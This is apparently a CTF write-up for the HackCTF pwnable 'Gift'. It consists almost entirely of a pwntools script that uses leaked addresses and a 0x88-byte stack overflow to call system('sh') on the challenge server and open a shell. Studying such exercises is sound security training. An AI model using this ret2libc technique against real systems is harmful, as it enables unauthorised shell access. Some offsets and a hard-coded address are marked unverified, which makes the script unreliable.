Pwnable/HackCTF
Gift
dtqdtq01
2019. 6. 20. 20:47

Gift
nc ctf.j0n9hyun.xyz 3013
from pwn import *
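# Target service from the challenge text: nc ctf.j0n9hyun.xyz 3013
# p = process("./gift")  # local binary, for offline debugging
p = remote('ctf.j0n9hyun.xyz', 3013)

# Defender's view of what this script relies on (inferred from the script,
# the binary itself is not shown here):
#   1. the service prints two raw addresses to every client, and
#   2. the second input is apparently copied to the stack without a length
#      limit, so 0x88 filler bytes reach the saved return address.
# Bounded input handling, a stack protector, and not printing pointers each
# remove one of those preconditions.

# The banner is followed by two hex values on the same line.
p.recvuntil(b'Hey guyssssssssss here you are:')
leak = p.recvline()
# Fixed-width slicing assumes a 9-character first field and a one-character
# separator -- TODO confirm against the real banner format.
bss_addr = int(leak[0:9], 16)     # first leaked value; not used below
system_addr = int(leak[10:], 16)  # second leaked value (system, per the comment below)

# First prompt: any short input; the next line of output is read and dropped.
p.sendline(b'aaaaa')
p.recvline()

# Second input. Bytes literals are used throughout because p32() returns
# bytes; concatenating it onto a str raises TypeError on Python 3.
payload2 = b'A' * 0x88         # filler up to the saved return address
payload2 += p32(system_addr)   # libc_system
payload2 += b'BBBB'            # placeholder for the return address after the call
# Hard-coded address: presumably valid only for this exact build loaded at a
# fixed base -- verify against the binary.
payload2 += p32(0x8048f48)     # sh
p.sendline(payload2)
p.interactive()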